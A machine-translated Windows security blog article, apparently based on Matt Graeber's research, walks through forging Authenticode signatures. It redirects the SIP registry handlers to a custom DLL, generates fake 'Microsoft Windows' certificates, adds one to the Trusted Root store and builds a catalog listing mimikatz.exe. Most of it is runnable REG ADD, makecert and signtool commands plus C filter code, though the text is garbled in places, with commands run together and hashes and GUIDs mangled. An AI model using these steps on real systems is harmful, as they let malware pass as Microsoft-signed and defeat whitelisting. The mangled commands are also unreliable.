0 x00 preface
Authenticode signature forgery is an Authenticode signature forgery for a single file, which requires a forged signature data at the end of the file. This time, we will introduce another type of signature forgery: By modifying the signature acquisition mechanism of the system, the system can be tricked into identifying normal files as containing signature data.
Note:
The tips in this article are from Matt Graeber@mattifestation’s open source. This article will incorporate my own experience and add my own understanding.
References:
Specterops. IO/assets/reso…
www.exploit-monday.com/2017/08/app…
Drive.google.com/file/d/0B-K…
0 x01 profile
This article will introduce the following contents:
· Signature forgery method for Powershell scripts
· Signature forging method for PE files
· Signature forgery methods for other types of documents
· Add code to forge signatures for specific files
0x02 Signature forgery method for PowerShell Scripts
The premise is that powershell scripts need to include a signature (self-generated signatures will be recognized as invalid). Here’s how to forge this invalid signature into a valid Microsoft signature
Generate test certificate:
Makecert -n "CN=Microsoft Windows Test1" -R-EKu 1.3.6.1.5.5.7.3.3 -SV Certtest. PVK certtest certtest.spcpvk2pfx -pvk certtest.pvk -pi 123456 -spc certtest.spc -pfx certtest.pfx -f
There is no need to register the certificate
Note:
To use makecert.exe, add -eku 1.3.6.1.5.5.7.3.3
Otherwise, the certificate cannot be used for code signing. The error is as follows:
Set-AuthenticodeSignature : Cannot sign code. The specified certificate is not
suitable for code signing.
The following figure
Sign a Powershell script:
$cert = Get-PfxCertificate certtest.pfxSet-AuthenticodeSignature -Filepath 1.ps1 -Cert $cert
Certificate of Verification:
Get-AuthenticodeSignature .1.ps1
When “UnknownError” is displayed, the file signature is invalid
The following figure
To modify the registry, run the following command:
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /fREG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v "FuncName" /t REG_SZ /d "AutoApproveHash" /fREG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /fREG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v "FuncName" /t REG_SZ /d "GetLegitMSSignature" /f
Verify again:
Get-AuthenticodeSignature .1.ps1
If the command output is Valid, the signature is Valid
The following figure
Note:
The signatures of files with the same name vary in different systems
AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033 for Matt Graeber notepad in the test system. The exe signed hash
Now test on our own system: Win10 X64
Signature of notepad.exe:
Get-AuthenticodeSignature c:\windows\system32\notepad.exe
sigcheck -i C:\Windows\System32\notepad.exe
You can see that in sigcheck’s output, Thumbprint corresponds to the file signature hash, as shown below
Next, change the test system to Win7 x86
Exe signature cannot be obtained using get-Authenticodesignature (catalog signature).
The following figure
But it can be obtained by sigcheck as shown below
Hash for: 018 b222e21fbb2952304d04d1d87f736ed46dea4
Locate the cat file path: C:\Windows\ System32 \CatRoot\{f750e6C3-38ee-11d1-85e5-00c04fc295ee}\ntexe.cat
Cat files are saved in ASN.1 standard format and cannot be viewed directly using Notepad. Decryption is required. The online address is as follows:
lapo.it/asn1js/
Select cat file to decrypt to display the full format
Format analysis can refer to:
Support.microsoft.com/en-us/help/…
Will replace the file in PoCSubjectInterfacePackage engineering MS_cert. Bin and recompile
Configuring the Registry
Open a new CMD and view powershell script signatures:
Get-AuthenticodeSignature .1.ps1
Same hash value as sighCheck gets, as shown below
The Authenticode signature of the PowerShell script was forged successfully. Procedure
Intuitive understanding of the above operations:
This is done by modifying the system certificate validation procedure so that the file has the specified Catalog signature as its own Authenticode signature
All signed powershell scripts, of course, will be unified into a hash of 018 b222e21fbb2952304d04d1d87f736ed46dea4 signature, this raises the question: this will affect the normal system file signature verification
As you can see, forging signatures in this way applies to all Powershell scripts, so can we forge signatures for specific Powershell scripts?
To Matt Graeber PoCSubjectInterfacePackage open source project as a template, modified download address is as follows:
Github.com/mattifestat…
Focus on the function GetLegitMSSignature
Github.com/mattifestat…
View the parameter description of the SIP_SUBJECTINFO *pSubjectInfo structure as follows:
Msdn.microsoft.com/en-us/libra…
Both pwsFileName and pwsDisplayName can represent the file name, so you can use MessageBox for verification
Add the following code to GetLegitMSSignature:
MessageBox (NULL, pSubjectInfo->pwsFileName, pSubjectInfo->pwsDisplayName,0);
Test and successfully get the incoming file name, as shown below
Next thought:
Judge the name of the incoming file, load the corresponding catalog signature of the file that meets the conditions, and finally realize the signature forgery of the specific file
The code for filtering files is as follows:
if(lstrcmpi((LPCTSTR)pSubjectInfo->pwsFileName,L"C:\test\cer1.ps1")==0){MessageBox (NULL,L"Get selected file", (LPCTSTR)pSubjectInfo->pwsFileName,0) ; }
The complete code can be referred to:
Raw.githubusercontent.com/3gstudent/t…
If the current file is C: testCer1.ps1, the signature is forged. Otherwise, the signature is abandoned
The test is shown below.
The advantage of this method is that you do not need to add the Authenticode signature to the end of the file and do not change the file hash
Of course, this is just a POC, and you have to judge the system file’s signature verification
0x03 Method of forging signatures for PE files
Refer to this list:
· C689AAB8-8 e78 d0-8-11 c47 flight – 00 c04fc295ee – PE
· DE351A43-8E59-11d0-8C47-00c04FC295EE — Catalog. Cat file
· 9BA61d3F-e73A-11d0-8CD2-00c04FC295ee — ctl. CTL file
· C689AABA-8E78-11d0-8C47-00C04FC295EE — Cabinet.cab file
If replace the exe file check, CryptSIPDllGetSignedDataMsg CryptSIPDllVerifyIndirectData and command is as follows:
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /fREG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v "FuncName" /t REG_SZ /d "AutoApproveHash" /fREG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /fREG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OIDEncoding\Type 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v "FuncName" /t REG_SZ /d "GetLegitMSSignature" /f
Restart explorer. Exe, all exe file contains a hash for: 018 b222e21fbb2952304d04d1d87f736ed46dea4 signature
Special feature: Forged signatures come from cat files, but are displayed as Authenticode signatures, which can be seen through file properties (this is a feature of Authenticode signatures, not catalog signatures)
Similarly, modifying the original project can achieve signature forgery for specific PE files, and the method will not be described again
0x04 Signature forgery method for CAT file
If you replace the signature validation process for all.cat files and add them to the security catalog database, does the PE file that contains the catalog signature also get forged signatures?
Here’s the test:
Create a new text file cat.txt with the following contents:
[CatalogHeader]Name=makecat1.cat[CatalogFiles]<hash>ExeFile1=mimikatz.exe
Note:
A blank line is required at the end of the TXT file, otherwise an error will be reported in subsequent operations, indicating that the file could not be found
Makecat.exe to generate makecat1.cat:
makecat -v cat.txt
Add forged Authenticode signature to makecat1.cat:
signtool sign /f certtest.pfx /p 123456 makecat1.cat
Note:
Certtest. PFX do not use the manually generated certificate. Do not add -eku 1.3.6.1.5.5.7.3.3; otherwise, the catalog signature of the EXE file will fail to be verified
Generate certtest. PFX as follows:
makecert -n "CN=Microsoft Windows Test1" -r -sv certtest.pvk certtest.cercert2spc certtest.cer certtest.spcpvk2pfx -pvk certtest.pvk -pi 123456 -spc certtest.spc -pfx certtest.pfx -f
Here you also need to install the certificate into the Trusted Root Certification Authorities store
Administrator rights:
certmgr.exe -add -c certtest.cer -s -r localmachine root
Otherwise, an error will be reported in the subsequent signature verification, indicating that the certificate chain is not trusted
Supplement:
To delete a certificate from the Trusted Root Certification Authorities store:
(Administrator permission)
certmgr.exe -del -c -n "Windows Test1" -s -r localMachine Root
The GUID of the cat file is DE351a43-8e59-11d0-8C47-00c04FC295ee
Replace registry key values:
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /fREG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE}" /v "FuncName" /t REG_SZ /d "AutoApproveHash" /fREG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /fREG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\Encoding\Type 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}" /v "FuncName" /t REG_SZ /d "GetLegitMSSignature" /f
Restart Explorer. Exe. All cat files are signed Microsoft Windows
Add makecat1.cat to your system’s security catalog database:
(Administrator permission)
signtool catdb -v makecat1.cat
Finally, the catalog signature of the file remains unchanged and cannot be forged
Conclusion: The catalog signature cannot be forged in this way
0 x05 summary
This article describes another way to exploit Authenticode signature forgery: by modifying the system’s signature retrieval mechanism, tricking the system into recognizing a normal file as containing signature data.
After the tests of these two articles, the final conclusion is that the Authenticode signature should be treated with caution, because the Microsoft signature can be forged by modifying the registry or hijacking DLL, for this reason, the defense mechanism such as whitelist should not blindly trust Authenticode signed files.
www.4hou.com/system/7938…